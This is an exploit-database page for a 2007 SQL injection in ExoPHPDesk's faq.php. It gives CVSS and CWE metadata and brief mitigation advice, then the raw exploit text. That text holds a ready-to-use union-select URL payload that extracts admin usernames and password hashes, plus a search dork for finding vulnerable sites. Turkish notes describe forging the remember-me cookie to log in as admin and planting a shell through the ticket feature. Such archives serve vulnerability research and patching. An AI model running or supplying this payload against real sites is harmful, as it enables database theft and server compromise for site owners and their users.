header-logo
Suggest Exploit
vendor:
ExoPHPDesk
by:
ajann
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: ExoPHPDesk
Affected Version From: 1
Affected Version To: 1.2.2001
Patch Exists: NO
Related CWE:
CPE: a:exoscripts:exophpdesk:1.2.1
Metasploit:
Other Scripts:
Platforms Tested:
2007

ExoPHPDesk <= 1.2.1 (faq.php) Remote SQL Injection Vulnerability

This exploit allows an attacker to perform a remote SQL injection attack on ExoPHPDesk version 1.2.1 through the faq.php file. By manipulating the 'id' parameter in the URL, an attacker can execute arbitrary SQL queries and potentially gain unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, it is recommended to upgrade to a newer version of ExoPHPDesk that includes a patch for the SQL injection vulnerability. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  ExoPHPDesk <= 1.2.1 (faq.php) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.exoscripts.com
# $$      :  Free
# Dork    :  Powered by ExoPHPDesk v1.2 Final.
# DorkEx  :  http://www.google.com.tr/search?q=Powered+by+ExoPHPDesk+v1.2+Final.+&hl=tr&start=0&sa=N

# Info    : \* Google aramasi sonucu admin kullanici adini ve hashlarini ele
           gecirdiginizde md5 ile sifrelenmis hashi kirmamiza gerek yok.
           Siteye uye olarak beni hatirla tarzi cookie ile girisimizi yaparak,
           cookilerde tutulan UserName ve Pass'i degistererek , admin yetkisi
           ile giris yapabilirsiniz.Daha sonra ticket bolumunden eger serverda
           ayarlar tamsa(configdeki) shell sokabilirsiniz. /*

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//faq.php?action=&type=view&s=&id=[SQL]

Example:

//faq.php?action=&type=view&s=&id=-1'%20union%20select%200,concat(char(85),char(115),char(101),char(114),char(110),char(97),char(109),char(101),char(58),name,char(32),char(124),char(124),char(32),char(80),char(97),char(115),char(115),char(119),char(111),char(114),char(100),char(58),pass),0,0,0,0,0%20from%20phpdesk_admin/*

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-31]